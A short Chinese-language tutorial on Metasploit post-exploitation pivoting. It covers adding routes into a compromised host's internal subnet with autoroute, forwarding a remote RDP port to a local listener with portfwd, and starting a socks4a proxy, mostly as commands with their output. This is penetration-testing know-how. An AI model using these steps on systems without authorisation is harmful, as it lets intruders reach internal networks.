Metasploit-route和端口转发

路由

自动添加路由

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. 

[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Local subnet: 172.17.0.0/255.255.0.0

由此可知，目标内网网段是“172.17.0.0./24”

添加去往目标网段的转发路由：

meterpreter > run autoroute -s 172.17.0.0/24

添加路由成功后，我们查看路由的添加情况：

meterpreter > run autoroute -p

手动添加路由

route add 192.168.206.200  255.255.255.0  1
route print

端口转发

meterpreter > portfwd 
0 total local port forwards.
meterpreter > portfwd  -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

反弹10.1.1.129端口3389到本地2222并监听那么可以使用如下方法：

meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389
meterpreter > portfwd 
0: 0.0.0.0:2222 -> 10.1.1.129:3389
1 total local port forwards.

建立代理

使用 socks4a并且配置，监听端口

msf exploit(handler) > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > show options 
Module options (auxiliary/server/socks4a):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.
Auxiliary action:
   Name   Description
   ----   -----------
   Proxy  
msf auxiliary(socks4a) > exploit -y
[*] Auxiliary module execution completed
msf auxiliary(socks4a) > 
[*] Starting the socks4a proxy server